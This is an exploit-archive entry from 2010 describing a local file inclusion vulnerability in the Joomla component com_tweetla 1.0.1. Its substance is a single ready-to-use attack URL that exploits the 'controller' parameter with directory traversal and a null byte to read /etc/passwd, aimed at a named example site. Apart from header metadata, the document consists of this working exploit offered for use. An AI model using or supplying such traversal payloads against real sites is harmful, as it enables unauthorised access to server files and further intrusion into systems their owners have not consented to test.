id: 11715
date: 04/11/2010
title: Joomla Component com_tweetla Local File Inclusion Vulnerability
author: AntiSecurity
cves: 

===============================================================
Joomla Component com_tweetla Local File Inclusion Vulnerability
===============================================================

# Exploit Title:
Joomla Component TweetLA! Local File Inclusion Vulnerability
 
# Date:
April 11 2010
 
# Author:
AntiSecurity
 
# Software Link:
http://www.demo-page.de/
 
# Version:
com_tweetla version 1.0.1
 
# Tested on:
Linux
 
# Target example
http://www.demo-page.de/index.php?option=com_tweetla&controller=../../../../../../../../../../../../../../../etc/passwd%00



#  0day.today [2023-03-21]  #